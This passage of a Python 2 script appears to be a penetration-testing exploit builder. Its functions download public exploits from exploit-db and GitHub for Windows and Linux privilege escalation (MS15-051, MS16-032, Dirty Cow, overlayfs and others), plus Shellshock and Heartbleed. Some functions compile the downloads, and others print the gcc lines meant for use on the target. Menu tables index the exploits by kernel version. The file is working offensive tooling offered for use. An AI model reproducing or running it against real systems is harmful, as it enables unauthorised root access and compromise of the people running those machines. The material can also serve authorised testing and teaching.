    ('Fixing...', 'head -n 287 ms15-010.cpp > ex.cpp; tail -n 59 ms15-010.cpp > ex.h'),
    ('Compiling...', 'i686-w64-mingw32-g++ ex.cpp -o ms15-010.exe'),
    ('Cleaning up...', 'rm ms15-010.cpp'),
  ]
  if not run(steps):
    return
  printGood("ms15-010.exe successfully created")

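def ms15_051():
  """Fetch the prebuilt 32- and 64-bit bin-sploit 37049 binaries as ms15-051_32.exe / ms15-051_64.exe.

  Both executables are downloaded ready-made and used without any
  verification of their contents. The single step is a (label, shell
  command) pair handed to run(); the summary is printed only when run()
  returns a truthy value.
  """
  steps = [
    ('Downloading...', 'wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37049-32.exe -O ms15-051_32.exe; wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37049-64.exe -O ms15-051_64.exe'),
  ]
  if not run(steps):
    return
  # Message corrected: the original named ms15_051_64.exe, but the
  # download step writes ms15-051_64.exe.
  printGood("ms15-051_32.exe and ms15-051_64.exe successfully created")
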
def ms16_014():
  """Fetch bin-sploit 40039, unpack it, and build ms16-014.exe from 40039/MS16-014.cpp.

  NOTE(review): the cleanup removes the zip and __MACOSX but, unlike the
  other unpackers, leaves the 40039/ tree in place — confirm that is
  intended. Steps are (label, shell command) pairs handed to run(); the
  summary is printed only when run() returns a truthy value.
  """
  steps = [
    ('Downloading...', 'wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40039.zip -O ms16-014.zip'),
    ('Unpacking...', 'unzip ms16-014.zip'),
    ('Compiling...', 'cd 40039; i686-w64-mingw32-g++ MS16-014.cpp -o ../ms16-014.exe'),
    ('Cleaning up...', 'rm -r ms16-014.zip __MACOSX'),
  ]
  if not run(steps):
    return
  printGood("ms16-014.exe successfully created")

def ms16_016():
  """Fetch bin-sploit 39788, unpack its compiled.zip, and keep EoP.exe (as ms16_016.exe) plus Shellcode.dll.

  Both artefacts are prebuilt binaries taken as-is. Steps are (label,
  shell command) pairs handed to run(); the summary is printed only when
  run() returns a truthy value.
  """
  steps = [
    ('Downloading...', 'wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39788.zip -O ms16-016.zip'),
    ('Unpacking...', 'unzip ms16-016.zip; cd 39788; unzip compiled.zip'),
    ('Cleaning up...', 'cp 39788/EoP.exe ms16_016.exe; cp 39788/Shellcode.dll Shellcode.dll;rm ms16-016.zip; rm -r 39788 __MACOSX'),
  ]
  if not run(steps):
    return
  printGood("ms16_016.exe and Shellcode.dll successfully created")

def ms16_032():
  """Fetch exploit-db entry 39719 as ms16_032.ps1; nothing is compiled.

  The single step is a (label, shell command) pair handed to run(); the
  summary is printed only when run() returns a truthy value.
  """
  steps = [
    ('Downloading...', 'wget https://www.exploit-db.com/download/39719 -O ms16_032.ps1'),
  ]
  if not run(steps):
    return
  printGood("ms16_032.ps1 successfully created\n\t - for use with powershell")

# Menu entries for the "windows local" category: (display label, builder).
# A leading '*' on a label marks an entry the header flags as broken or as
# needing compilation on the target.
exploits_windows_local = [
  ("windows-privesc-check", windows_privesc_check),
  ("ms04-011", ms04_011_local),
  ("ms04-019 (1)", ms04_019_1),
  ("ms04-019 (2)", ms04_019_2),
  ("ms04-019 (3)", ms04_019_3),
  ("ms04-020", ms04_020),
  ("*keybd_event", keybd),
  ("*ms05-018", ms05_018),
  ("*ms05-055", ms05_055),
  ("ms06-030", ms06_030),
  ("ms06-049", ms06_049),
  ("print spool service", spool),
  ("*ms08-025", ms08_025),
  ("netdde", netdde),
  ("ms10-015", ms10_015),
  ("ms10-059", ms10_059),
  ("ms10-092", ms10_092),
  ("ms11-080", ms11_080),
  ("ms14-040", ms14_040),
  ("*ms14-058 (1)", ms14_058_1),
  ("ms14-058 (2)", ms14_058_2),
  ("*ms14-070 (1)", ms14_070_1),
  ("ms14-070 (2)", ms14_070_2),
  ("*ms15-010 (1)", ms15_010_1),
  ("*ms15-010 (2)", ms15_010_2),
  ("ms15-051", ms15_051),
  ("*ms16-014", ms16_014),
  ("ms16-016", ms16_016),
  ("ms16-032", ms16_032),
]

# ------------------------------------
# LINUX REMOTE
# ------------------------------------

def shellshock():
  """Fetch exploit-db entry 34900 as shellshock.py and mark it executable (mode 744).

  Steps are (label, shell command) pairs handed to run(); the script is
  used as downloaded. The summary is printed only when run() returns a
  truthy value.
  """
  steps = [
    ('Downloading...', 'wget https://www.exploit-db.com/download/34900 -O shellshock.py'),
    ('Preparing...', 'chmod 744 shellshock.py'),
  ]
  if not run(steps):
    return
  printGood("shellshock.py successfully created\n\t")

def heartbleed():
  """Fetch heartbleed.c from the HackerFantastic/Public repo and build it natively with gcc.

  Links libssl statically and libssl3/libcrypto dynamically, so the
  build depends on the host's OpenSSL development files. Steps are
  (label, shell command) pairs handed to run(); the usage hint is printed
  only when run() returns a truthy value.
  """
  steps = [
    ('Downloading...', 'wget https://raw.githubusercontent.com/HackerFantastic/Public/master/exploits/heartbleed.c -O heartbleed.c'),
    ('Compiling...', 'gcc heartbleed.c -o heartbleed -Wl,-Bstatic -lssl -Wl,-Bdynamic -lssl3 -lcrypto'),
    ('Cleaning up...', 'rm heartbleed.c'),
  ]
  if not run(steps):
    return
  printGood("heartbleed successfully created\n\tUsage: heartbleed -s <target> -p <port> -f <output file> -v -t 1")

# Menu entries for the "linux remote" category: (display label, builder).
exploits_linux_remote = [
  ("shellshock", shellshock),
  ("heartbleed", heartbleed),
]

# ------------------------------------
# LINUX LOCAL
# -- These should be compiled on target if possible
# ------------------------------------

def linux_exploit_suggester():
  """Install the linux-exploit-suggester package and copy its Perl script into the working directory.

  NOTE(review): 'apt-get install' is run without -y and without any
  privilege escalation, so it will prompt and needs to be executed as
  root — confirm how run() is invoked. Steps are (label, shell command)
  pairs handed to run(); the usage hint is printed only when run()
  returns a truthy value.
  """
  steps = [
    ('Downloading...', 'apt-get install linux-exploit-suggester'),
    ('Cleaning up...', 'cp /usr/share/linux-exploit-suggester/Linux_Exploit_Suggester.pl linux-exploit-suggester.pl'),
  ]
  if not run(steps):
    return
  printGood("linux-exploit-suggester.pl successfully created\n\tUsage: perl linux-exploit-suggester.pl -k <kernel>")

def unix_privesc_check():
  """Fetch unix-privesc-check 1.4 over plain HTTP, unpack it, and keep the unix-privesc-check script.

  The download is over http:// with no integrity check, so the script is
  trusted as received. Steps are (label, shell command) pairs handed to
  run(); the summary is printed only when run() returns a truthy value.
  """
  steps = [
    ('Downloading...', 'wget http://pentestmonkey.net/tools/unix-privesc-check/unix-privesc-check-1.4.tar.gz'),
    ('Unpacking...', 'tar xvzf unix-privesc-check-1.4.tar.gz; cp unix-privesc-check-1.4/unix-privesc-check .'),
    ('Cleaning up...', 'rm unix-privesc-check-1.4.tar.gz; rm -r unix-privesc-check-1.4'),
  ]
  if not run(steps):
    return
  printGood("unix_privesc_check successfully created")

def sendpage_1():
  """Fetch exploit-db entry 9545 as sendpage.c and echo the gcc line to build it on the target.

  Nothing is compiled here: the second step only prints the command. The
  pairs are handed to run() and its result is ignored.
  """
  run([
    ('Downloading...', 'wget https://www.exploit-db.com/download/9545 -O sendpage.c'),
    ('Compile with:', 'echo "gcc -Wall -o sendpage sendpage.c"'),
  ])

def sendpage_2():
  """Fetch exploit-db entry 9479 as sendpage.c (same name as sendpage_1) and echo the gcc line.

  Nothing is compiled here; the pairs are handed to run() and its result
  is ignored.
  """
  run([
    ('Downloading...', 'wget https://www.exploit-db.com/download/9479 -O sendpage.c'),
    ('Compile with:', 'echo "gcc -Wall -o sendpage sendpage.c"'),
  ])

def ftruncate():
  """Fetch exploit-db entry 6851 as ftruncate.c and echo the gcc line plus a directory-search hint.

  Nothing is compiled here. The last echo nests double quotes inside
  double quotes, so the shell drops the inner pair around rwx when it
  prints the hint. The pairs are handed to run() and its result is
  ignored.
  """
  run([
    ('Downloading...', 'wget https://www.exploit-db.com/download/6851 -O ftruncate.c'),
    ('Compile with:', 'echo "gcc -o ftruncate ftruncate.c"'),
    ('Note: use in world-writable directory, located using the following command:', 'echo "find / -perm -2000 -type d 2>/dev/null|xargs ls -ld|grep "rwx""'),
  ])

def cap_sys_admin():
  """Fetch exploit-db entry 15944 as cap_sys_admin.c and echo the gcc line to build it on the target.

  Nothing is compiled here; the pairs are handed to run() and its result
  is ignored.
  """
  run([
    ('Downloading...', 'wget https://www.exploit-db.com/download/15944 -O cap_sys_admin.c'),
    ('Compile with:', 'echo "gcc -w cap_sys_admin.c -o cap_sys_admin_expl"'),
  ])

def compat():
  """Fetch exploit-db entry 15024 as compat.c and echo the gcc line to build it on the target.

  Nothing is compiled here; the pairs are handed to run() and its result
  is ignored.
  """
  run([
    ('Downloading...', 'wget https://www.exploit-db.com/download/15024 -O compat.c'),
    ('Compile with:', 'echo "gcc -o compat compat.c"'),
  ])

def can_bcm():
  """Fetch exploit-db entry 14814 as can_bcm_expl.c and echo the gcc line to build it on the target.

  Nothing is compiled here; the pairs are handed to run() and its result
  is ignored.
  """
  run([
    ('Downloading...', 'wget https://www.exploit-db.com/download/14814 -O can_bcm_expl.c'),
    ('Compile with:', 'echo "gcc -o can_bcm_expl can_bcm_expl.c"'),
  ])

def rdsProtocol():
  """Fetch exploit-db entry 15285 as rds_expl.c and echo the gcc line to build it on the target.

  Nothing is compiled here; the pairs are handed to run() and its result
  is ignored.
  """
  run([
    ('Downloading...', 'wget https://www.exploit-db.com/download/15285 -O rds_expl.c'),
    ('Compile with:', 'echo "gcc -o rds_expl rds_expl.c"'),
  ])

def halfNelson():
  """Fetch exploit-db entry 17787 as half-nelson.c and echo the gcc line (links -lrt) for the target.

  Nothing is compiled here; the pairs are handed to run() and its result
  is ignored.
  """
  run([
    ('Downloading...', 'wget https://www.exploit-db.com/download/17787 -O half-nelson.c'),
    ('Compile with:', 'echo "gcc -o half-nelson half-nelson.c -lrt"'),
  ])

def fullNelson():
  """Fetch exploit-db entry 15704 as full-nelson.c and echo the gcc line to build it on the target.

  Nothing is compiled here; the pairs are handed to run() and its result
  is ignored.
  """
  run([
    ('Downloading...', 'wget https://www.exploit-db.com/download/15704 -O full-nelson.c'),
    ('Compile with:', 'echo "gcc -o full-nelson full-nelson.c"'),
  ])

def udev():
  """Fetch exploit-db entry 8572 as udev_expl.c and echo the gcc line to build it on the target.

  Nothing is compiled here; the pairs are handed to run() and its result
  is ignored.
  """
  run([
    ('Downloading...', 'wget https://www.exploit-db.com/download/8572 -O udev_expl.c'),
    ('Compile with:', 'echo "gcc -o udev_expl udev_expl.c"'),
  ])

def sgid():
  """Fetch exploit-db entry 33824 as sgid_expl.c and echo the gcc line to build it on the target.

  Nothing is compiled here; the pairs are handed to run() and its result
  is ignored.
  """
  run([
    ('Downloading...', 'wget https://www.exploit-db.com/download/33824 -O sgid_expl.c'),
    ('Compile with:', 'echo "gcc -o sgid_expl sgid_expl.c"'),
  ])

def overlayfs_1():
  """Fetch exploit-db entry 37292 as overlayfs.c and echo the gcc line to build it on the target.

  overlayfs_2 and overlayfs_3 write the same file name. Nothing is
  compiled here; the pairs are handed to run() and its result is ignored.
  """
  run([
    ('Downloading...', 'wget https://www.exploit-db.com/download/37292 -O overlayfs.c'),
    ('Compile with:', 'echo "gcc -o overlayfs overlayfs.c"'),
  ])

def libfutex():
  """Fetch exploit-db entry 35370 as libfutex.c and echo the gcc line (links -lpthread) for the target.

  Nothing is compiled here; the pairs are handed to run() and its result
  is ignored.
  """
  run([
    ('Downloading...', 'wget https://www.exploit-db.com/download/35370 -O libfutex.c'),
    ('Compile with:', 'echo "gcc -o libfutex libfutex.c -lpthread"'),
  ])

def mempodipper():
  """Fetch exploit-db entry 18411 as mempodipper.c and echo the gcc line to build it on the target.

  Nothing is compiled here; the pairs are handed to run() and its result
  is ignored.
  """
  run([
    ('Downloading...', 'wget https://www.exploit-db.com/download/18411 -O mempodipper.c'),
    ('Compile with:', 'echo "gcc -o mempodipper mempodipper.c"'),
  ])

def alpha_omega():
  """Fetch exploit-db entry 17391 as alpha-omega.c and echo the gcc line to build it on the target.

  Nothing is compiled here; the pairs are handed to run() and its result
  is ignored.
  """
  run([
    ('Downloading...', 'wget https://www.exploit-db.com/download/17391 -O alpha-omega.c'),
    ('Compile with:', 'echo "gcc -o alpha-omega alpha-omega.c"'),
  ])

def dirtycow():
  """Fetch exploit-db entry 40616 as dirtycow_64.c, derive dirtycow_32.c from it with sed, and echo both gcc lines.

  The sed chain wraps the 64-bit payload block in a C comment and
  uncomments the 32-bit one in the copy; the edits match exact byte
  sequences and sc_len values, so they break silently if the upstream
  file changes. Nothing is compiled here; the pairs are handed to run()
  and its result is ignored.
  """
  run([
    ('Downloading...', 'wget https://www.exploit-db.com/download/40616 -O dirtycow_64.c'),
    ('Fixing...', "cp dirtycow_64.c dirtycow_32.c; sed -i 's/0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,/\/* 0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,/g' dirtycow_32.c; sed -i 's/unsigned int sc_len = 177;/unsigned int sc_len = 177; *\//g' dirtycow_32.c; sed -i 's/0x7f, 0x45, 0x4c, 0x46, 0x01, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,/*\/ 0x7f, 0x45, 0x4c, 0x46, 0x01, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,/g' dirtycow_32.c; sed -i 's/unsigned int sc_len = 136;/unsigned int sc_len = 136;\/*/g' dirtycow_32.c"),
    ('Compile with:', 'echo "gcc -o dirtycow_64 dirtycow_64.c -pthread"; echo "gcc -o dirtycow_32 dirtycow_32.c -pthread"'),
  ])

def msr():
  """Fetch exploit-db entry 27297 as msr_expl.c and echo the gcc line to build it on the target.

  Nothing is compiled here; the pairs are handed to run() and its result
  is ignored.
  """
  run([
    ('Downloading...', 'wget https://www.exploit-db.com/download/27297 -O msr_expl.c'),
    ('Compile with:', 'echo "gcc -o msr_expl msr_expl.c"'),
  ])

def perf_swevent_init():
  """Fetch exploit-db entry 26131 as perf.c and echo the gcc line to build it on the target.

  Nothing is compiled here; the pairs are handed to run() and its result
  is ignored.
  """
  run([
    ('Downloading...', 'wget https://www.exploit-db.com/download/26131 -O perf.c'),
    ('Compile with:', 'echo "gcc -o perf perf.c"'),
  ])

def overlayfs_2():
  """Fetch exploit-db entry 39166 as overlayfs.c and echo the gcc line to build it on the target.

  Same file name as overlayfs_1 and overlayfs_3. Nothing is compiled
  here; the pairs are handed to run() and its result is ignored.
  """
  run([
    ('Downloading...', 'wget https://www.exploit-db.com/download/39166 -O overlayfs.c'),
    ('Compile with:', 'echo "gcc -o overlayfs overlayfs.c"'),
  ])

def overlayfs_3():
  """Fetch exploit-db entry 39230 as overlayfs.c and echo the gcc line to build it on the target.

  Same file name as overlayfs_1 and overlayfs_2. Nothing is compiled
  here; the pairs are handed to run() and its result is ignored.
  """
  run([
    ('Downloading...', 'wget https://www.exploit-db.com/download/39230 -O overlayfs.c'),
    ('Compile with:', 'echo "gcc -o overlayfs overlayfs.c"'),
  ])

def af_packet():
  """Fetch exploit-db entry 40871 as af_packet.c and echo the gcc line (links -lpthread) for the target.

  Nothing is compiled here; the pairs are handed to run() and its result
  is ignored. The label carries a trailing space, reproduced as-is.
  """
  run([
    ('Downloading...', 'wget https://www.exploit-db.com/download/40871 -O af_packet.c'),
    ('Compile with: ', 'echo "gcc -o af_packet af_packet.c -lpthread"'),
  ])

def double_fdput():
  """Fetch bin-sploit 39772.zip from the exploit-database GitHub mirror and unpack it.

  Each step is executed by run() in its own shell, so the ``cd 39772`` in the
  unpack step does not carry over; the build instruction therefore repeats the
  directory change, and the last step is a label-only reminder (empty command).
  """
  steps = (
    ('Downloading...', 'wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39772.zip -O double_fdput.zip'),
    ('Unpacking...', 'unzip double_fdput.zip; cd 39772; tar xvf exploit.tar;'),
    ('Compile with: ', 'echo "cd 39772/ebpf_mapfd_doubleput_exploit; ./compile.sh"'),
    ('Run ./doubleput', ''),
  )
  run(steps)
def netfilter():
  """Fetch exploit-db entry 40049 and split it into two C sources.

  The "Fixing..." step writes the last 50 lines to pwn.c and lines 6-213
  (the last 208 of the first 213) to decr.c, via a temporary intermediate.c;
  the cleanup step removes the download and the temporary file.  Building is
  left to the user and the order "decr, then pwn" is given as a label-only step.
  """
  steps = (
    ('Downloading...', 'wget https://www.exploit-db.com/download/40049 -O netfilter.c'),
    ('Fixing...', 'tail -n 50 netfilter.c > pwn.c; head -n 213 netfilter.c > intermediate.c; tail -n 208 intermediate.c > decr.c'),
    ('Compile with:', 'echo "gcc -o decr decr.c -m32 -O2; gcc pwn.c -O2 -o pwn"'),
    ('Run decr, then pwn', ''),
    ('Cleaning up...', 'rm netfilter.c intermediate.c'),
  )
  run(steps)
def refcount():
  """Fetch exploit-db entry 39277 as refcount.c and echo its gcc command line.

  The echoed command links against keyutils (-lkeyutils); the build itself is
  left to the user.
  """
  steps = (
    ('Downloading...', 'wget https://www.exploit-db.com/download/39277 -O refcount.c'),
    ('Compile with:', 'echo "gcc -o refcount refcount.c -lkeyutils -Wall"'),
  )
  run(steps)
# Menu table for the "Linux Local" category: (label, builder) pairs.
# Position matters: the numeric id shown by usage() and accepted by select()
# is the entry's index plus endpoints(3), so append new entries at the end
# rather than inserting in the middle.  A leading '*' on a label marks an
# option that, per the file header, either doesn't work or needs compilation
# on the target.
# NOTE(review): every builder fetches its source with wget and performs no
# checksum or signature verification, so what ends up compiled is whatever
# the remote host serves at that moment.
exploits_linux_local = [
  ("linux-exploit-suggester"    ,   linux_exploit_suggester),
  ("unix_privesc_check"     ,   unix_privesc_check),
  ("kernel 2.4.x / 2.6.x (sock_sendpage 1)"   ,   sendpage_1),
  ("kernel 2.4 / 2.6 (sock_sendpage 2)" ,   sendpage_2),
  ("kernel < 2.6.22 (ftruncate)"    ,   ftruncate),
  ("kernel < 2.6.34 (cap_sys_admin)"    ,   cap_sys_admin),
  ("kernel 2.6.27 < 2.6.36 (compat)"    ,   compat),
  ("kernel < 2.6.36-rc1 (can bcm)"  ,   can_bcm),
  ("kernel <= 2.6.36-rc8 (rds protocol)"   , rdsProtocol),
  ("*kernel < 2.6.36.2 (half nelson)"    ,   halfNelson),
  ("*kernel <= 2.6.37 (full nelson)"    ,   fullNelson),
  ("kernel 2.6 (udev)"  ,   udev),
  ("kernel 3.13 (sgid)" ,   sgid),
  ("kernel 3.13.0 < 3.19 (overlayfs 1)" ,   overlayfs_1),
  ("kernel 3.14.5 (libfutex)"   ,   libfutex),
  ("kernel 2.6.39 <= 3.2.2 (mempodipper)"   ,   mempodipper),
  ("*kernel 2.6.28 / 3.0 (alpha-omega)"  ,   alpha_omega),
  ("kernel 2.6.22 < 3.9 (Dirty Cow)"  ,   dirtycow),
  ("kernel 3.7.6 (msr)" ,   msr),
  ("*kernel < 3.8.9 (perf_swevent_init)" ,   perf_swevent_init),
  ("kernel <= 4.3.3 (overlayfs 2)"    ,   overlayfs_2),
  ("kernel 4.3.3 (overlayfs 3)"   ,   overlayfs_3),
  ("kernel 4.4.0 (af_packet)"   ,   af_packet),
  ("kernel 4.4.x (double-fdput)"   ,   double_fdput),
  ("kernel 4.4.0-21 (netfilter)"    ,   netfilter),
  ("*kernel 4.4.1 (refcount)"    ,   refcount)
]
# ------------------------------------
# UTILITY
# ------------------------------------
def endpoints(i):
  """Return the first exploit id that lies past category *i*.

  Categories are numbered 1..4 in the order windows-remote, windows-local,
  linux-remote, linux-local, and ids are assigned by position across the
  concatenated tables, so the answer for *i* is the cumulative length of the
  first *i* tables.  Input that int() rejects, and anything <= 0, yields 0;
  anything >= 4 yields the total number of entries.
  """
  try:
    level = int(i)
  except ValueError:
    return 0
  if level <= 0:
    return 0
  tables = (
    exploits_windows_remote,
    exploits_windows_local,
    exploits_linux_remote,
    exploits_linux_local,
  )
  # Slicing past the end simply takes all four tables for level >= 4.
  return sum(len(t) for t in tables[:level])
def usage():
  """Print the command-line usage followed by every exploit id, grouped by category."""
  print "USAGE: %s <exploit id>" % sys.argv[0]
  sections = (
    ("\nWindows Remote Exploits:", exploits_windows_remote),
    ("\nWindows Local Exploits:", exploits_windows_local),
    ("\nLinux Remote Exploits:", exploits_linux_remote),
    ("\nLinux Local Exploits:", exploits_linux_local),
  )
  for k, (heading, table) in enumerate(sections):
    print heading
    # Ids are global: this category starts where the previous one ended.
    first = endpoints(k)
    for offset, entry in enumerate(table):
      print "%i: %s" % (first + offset, entry[0])
def select(i):
  """Dispatch exploit id *i*: print a step banner, then call its builder.

  Returns False without doing anything when *i* is outside
  [0, endpoints(4)); otherwise runs the matching builder and returns True.
  """
  if i < 0 or i >= endpoints(4):
    return False
  tables = (
    exploits_windows_remote,
    exploits_windows_local,
    exploits_linux_remote,
    exploits_linux_local,
  )
  # Walk the categories in id order; the first upper bound above i wins.
  for k, table in enumerate(tables):
    if i < endpoints(k + 1):
      entry = table[i - endpoints(k)]
      printStep("Constructing %s" % entry[0])
      entry[1]()
      break
  return True
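def run(commands):
  """Execute a sequence of (label, shell_command) steps in order.

  For each step the label is printed via printStep and the command string is
  handed to the shell.  A step whose command is '' is a label-only step
  (``sh -c ''`` is a successful no-op), which the exploit tables use for
  "now run X" reminders.  Execution stops at the first failing step.

  Args:
    commands: iterable of (label, command) pairs.  The commands are fixed
      literal strings from this file; because they run with shell=True,
      never build them from user-supplied data.
  Returns:
    True when every step succeeded; False on the first non-zero exit status
    (CalledProcessError) or when the shell itself could not be started
    (OSError).  The failing step's label and the exception are reported via
    printErr, so the user can tell which step broke.
  """
  for c in commands:
    label, command = c[0], c[1]
    printStep(label)
    try:
      subprocess.check_call(command, shell=True)
    except (subprocess.CalledProcessError, OSError) as e:
      # Both failure modes used to print a bare "Command failed"; naming the
      # step and the cause makes a broken download or missing tool visible.
      printErr("Command failed (%s): %s" % (label, e))
      return False
  return True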
def printStep(s):
  """Print *s* as a '[*]' progress line in bright yellow (ANSI 93), then reset."""
  color, reset = '\033[93m', '\033[0m'
  print "%s [*] %s %s" % (color, s, reset)
def printErr(s):
  """Print *s* as a '[!]' error line in bright red (ANSI 91), then reset."""
  color, reset = '\033[91m', '\033[0m'
  print "%s [!] %s %s" % (color, s, reset)
def printGood(s):
  """Print *s* as a '[+]' success line in bright green (ANSI 92), then reset."""
  color, reset = '\033[92m', '\033[0m'
  print "%s [+] %s %s" % (color, s, reset)
# ------------------------------------
# MAIN
# ------------------------------------
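# Entry point: exactly one argument, the numeric exploit id listed by usage().
# (`!=` replaces the Python-2-only `<>` spelling; the exit status on a bad
# argument count stays 0, as before.)
if len(sys.argv) != 2:
  usage()
  sys.exit()

# A non-numeric argument and an out-of-range id are reported the same way,
# so both paths funnel into one "invalid selection" report instead of two
# duplicated print/usage() pairs.
try:
  success = select(int(sys.argv[1]))
except ValueError:
  success = False
if not success:
  print "[-] Invalid selection: %s" % sys.argv[1]
  usage()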